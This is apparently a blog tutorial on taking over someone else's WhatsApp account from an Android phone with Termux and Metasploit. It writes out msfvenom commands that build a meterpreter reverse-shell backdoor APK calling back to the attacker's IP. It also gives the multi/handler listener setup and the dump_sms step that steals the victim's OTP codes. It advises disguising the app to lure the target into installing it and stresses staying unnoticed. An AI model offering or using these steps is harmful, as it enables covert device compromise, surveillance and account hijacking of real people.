If you are looking for a way to hack WhatsApp with real definition then the answer is to use the Termux application.
And, if you want to try this trick, then at least you understand a little about using the Termux application, especially the Metasploit tool.
As is known, one of the most effective methods for breaking into other people’s WhatsApp via an Android phone is to use the Termux application.
Well, in this article I provide a complete tutorial from the beginning of the installation process with various scripts until the target WhatsApp account is completely hacked.
Compared to other methods, plowing in this way is relatively safer and can last a long time without the target being noticed.
Basic Flow of Tapping WhatsApp with Termux Application
This is the basic thing that you should know before you start, considering that tapping WhatsApp using the Termux application is quite a long process.
So, the main tool that will be used is the Metasploit Framework.
This Metasploit tool will later be used to create a backdoor application, this backdoor application will create a gap as well as a way to get the target WhatsApp account verification code.
After successfully getting the verification code in the form of OTP, you will be able to create a cloned WhatsApp account using the target number.
Read it too: How to Hack WhatsApp With Phone Backup
If described easily, the pattern is like this:
Install Metasploit Framework > Create Backdoor app > Send Backdoor app to target > Target install Backdoor application > Dump sms to get verification code > Create a WhatsApp account with the target number
Steps to Tap WhatsApp Using the Termux Application
Make sure you have installed the Termux application, if not, please download and install it first. This can be done via the link below:
Download the Termux App
Already? If so, please follow the discussion below:
Step 1: Install Metasploit Framework
To install Metasploit on termux, you can follow the tutorial I’ve made in this article:
How to Install Metasploit on Termux Android Without Root
Make sure Metasploit is successfully installed and can run smoothly.
Step 2: Create a Backdoor App
If you’ve heard the term Trojan Horse then this backdoor application works the same way.
When the app is installed by someone then you will get full access to the installer’s device.
Then how to make it? Please follow the steps below:
- Open the Termux application and type the basic command: apt update and apt upgrade.
- Run the Metasploit tool by entering the command: msfconsole it will look like this:
- The command to create a backdoor application like this:
msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=4444 -o /sdcard/NAME_APPLICATION.apk
What must be changed from the basic command above is the LHOST section which you must fill in with the IP address of your device.
To find out the IP address of the device, you can use the services on the site: whatsmyip.com.
You can change the name of the application to a name that can provoke other people to install the application later.
For example, your device’s IP address is 1.2.3.4.5 and the name of the application is DiscussAndroid, then the command will be like this:
msfvenom -p android/meterpreter/reverse_tcp LHOST=1.2.3.4.5 LPORT=4444 -o /sdcard/DiscussAndroid.apk
- Please enter the command with LHOST and the name of the application according to yours.
- Wait for the application creation process to complete.
After the application is successfully created, it will be stored in the directory sdcard with the name you wrote in the command.
At this point you should have successfully created a backdoor application and it is ready to use.
For reference, the device’s IP address will fluctuate and this is the main weakness of your backdoor application.
If the IP changes then you will have to create a new backdoor application with the latest IP as well.
Is there a way to work around this? Of course there are…
You can learn about Port Forwarding here: https://exploitsec.blogspot.com/2022/12/cara-hack-android-beda-network.html.
Step 3: Send and Ask Target to Install Backdoor Apps
This is the most important step…
In order for you to gain control over the target device then a backdoor application must be installed on the target device.
Please send the application (can be via WhatsApp or others) and ask the target to install it.
Step 4: Connect Target Device with Meterpreter
This stage can be done if you are sure that the target has installed the backdoor application, because if not, it will not connect successfully.
Still in the Metasploit tools, please enter the 5 commands below:
use multi/handler
set payload android/meterpreter/reverse_tcp
set lost YOUR_IP_ADDRESS
set lport 4444
exploit
If successfully connected then it will look like this:
If it appears meterpreter then it means you have gained access to the target device and the wiretapping can proceed.
Step 5: Dump SMS and Create Clone WhatsApp Account with Target Number
This is the last stage…
Please create a new WhatsApp account using the target number, later you will be asked to enter the OTP code sent to the target number, right?
Now to get the OTP code, just enter the command:
dump_sms
You will get all SMS messages on the target device including the OTP code sent by WhatsApp.
The sms collection is generated in .txt format which you can find in the Termux folder of your device storage.
Please open it and look for the sms containing the WhatsApp OTP code.
In this way, you will have complete control of the target WhatsApp account.
So that’s the discussion this time about how to hack WhatsApp Termux.
